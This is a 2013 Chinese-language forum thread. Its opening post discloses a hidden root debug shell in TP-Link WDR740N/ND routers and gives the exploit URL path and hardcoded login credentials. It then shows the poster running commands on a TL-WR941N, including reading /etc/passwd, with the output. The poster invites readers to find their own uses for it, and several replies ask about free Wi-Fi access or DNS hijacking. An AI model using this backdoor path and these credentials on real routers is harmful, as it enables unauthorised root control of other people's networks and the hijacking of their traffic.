设为首页收藏本站

简体中文 繁體中文 English 日本語 Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย french

搜索
热搜: 活动 交友 discuz

【干货】TP [复制链接]
查看:287 | 回复:35

327

主题

4844

回帖

1万

积分

论坛元老

积分
10723
发表于 2013-5-26 19:24:48 | 显示全部楼层 |阅读模式
本帖最后由 过客 于 2013-5-26 19:26 编辑

TP-Link  WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。

固件版本:3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam  Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000

开始测试:[ol]
  • cat /proc/cpuinfo&
  • 827
  • # system type                : Atheros AR7240 (Python)
  • processor                : 0
  • cpu model                : MIPS 24K V7.4
  • BogoMIPS                : 265.21
  • wait instruction        : yes
  • microsecond timers        : yes
  • tlb_entries                : 16
  • extra interrupt vector        : yes
  • hardware watchpoint        : yes
  • ASEs implemented        : mips16
  • VCED exceptions                : not available
  • VCEI exceptions                : not available
  • cat /etc/passwd&
  • 828
  • # root:x:0:0:root:/root:/bin/sh
  • Admin:x:0:0:root:/root:/bin/sh
  • bin:x:1:1:bin:/bin:/bin/sh
  • daemon:x:2:2:daemon:/usr/sbin:/bin/sh
  • adm:x:3:4:adm:/adm:/bin/sh
  • lp:x:4:7:lp:/var/spool/lpd:/bin/sh
  • sync:x:5:0:sync:/bin:/bin/sync
  • shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
  • halt:x:7:0:halt:/sbin:/sbin/halt
  • uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
  • operator:x:11:0:Operator:/var:/bin/sh
  • nobody:x:65534:65534:nobody:/home:/bin/sh
  • ap71:x:500:0:Linux User,,,:/root:/bin/sh
  • cat /proc/meminfo&
  • 843
  • # MemTotal:        30676 kB
  • MemFree:         12876 kB
  • Buffers:          1836 kB
  • Cached:           6056 kB
  • SwapCached:          0 kB
  • Active:           6116 kB
  • Inactive:         3892 kB
  • HighTotal:           0 kB
  • HighFree:            0 kB
  • LowTotal:        30676 kB
  • LowFree:         12876 kB
  • SwapTotal:           0 kB
  • SwapFree:            0 kB
  • Dirty:               0 kB
  • Writeback:           0 kB
  • Mapped:           4276 kB
  • Slab:             5436 kB
  • CommitLimit:     15336 kB
  • Committed_AS:     4324 kB
  • PageTables:        276 kB
  • VmallocTotal:  1048560 kB
  • VmallocUsed:      1944 kB
  • VmallocChunk:  1046464 kB
  • # ls /
  • bin      etc      linuxrc  proc     sbin     usr      web
  • dev      lib      mnt      root     tmp      var
  • # [/ol]复制代码至于利用这个东西能干啥……那就自己发挥吧,走了。



  • 本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    32

    主题

    1111

    回帖

    2356

    积分

    金牌会员

    积分
    2356
    发表于 2013-5-26 19:25:22 | 显示全部楼层
    额,好牛逼的样子

    29

    主题

    727

    回帖

    1561

    积分

    金牌会员

    积分
    1561
    发表于 2013-5-26 19:26:36 | 显示全部楼层
      我不懂

    101

    主题

    926

    回帖

    2165

    积分

    金牌会员

    积分
    2165
    发表于 2013-5-26 19:31:23 | 显示全部楼层
    哦。

    3

    主题

    228

    回帖

    473

    积分

    中级会员

    积分
    473
    发表于 2013-5-26 19:34:32 | 显示全部楼层


    不错。。。

    21

    主题

    721

    回帖

    1513

    积分

    金牌会员

    积分
    1513
    发表于 2013-5-26 19:35:18 | 显示全部楼层
    谢谢分享

    150

    主题

    1642

    回帖

    3814

    积分

    论坛元老

    积分
    3814
    发表于 2013-5-26 19:38:52 | 显示全部楼层
    不懂,能蹭网不

    1

    主题

    62

    回帖

    137

    积分

    注册会员

    积分
    137
    发表于 2013-5-26 19:41:26 | 显示全部楼层
    不懂。。可以劫持DNS吗?

    481

    主题

    3862

    回帖

    9225

    积分

    论坛元老

    积分
    9225
    发表于 2013-5-26 19:51:38 | 显示全部楼层
    不错啊分享

    0

    主题

    1

    回帖

    4

    积分

    新手上路

    积分
    4
    发表于 2013-5-26 20:02:23 | 显示全部楼层
    学习了

    80端口被封,还是好事
    您需要登录后才可以回帖 登录 | 立即注册

    论坛客服/商务合作/投诉举报:2171544 (QQ)
    落伍者创建于2001/03/14,本站内容均为会员发表,并不代表落伍立场!
    拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
    落伍官方微信:2030286 邮箱:(djfsys@gmail.com|tech@im286.com)
    © 2001-2014

    浙公网安备 33060302000191号

    浙ICP备11034705号 BBS专项电子公告通信管[2010]226号

      落伍法律顾问: ITlaw-庄毅雄

    Archiver|手机版|Discuz! X

    GMT+8, 2026-1-24 07:46 , Processed in 0.027088 second(s), 6 queries , Gzip On, Redis On.

    返回顶部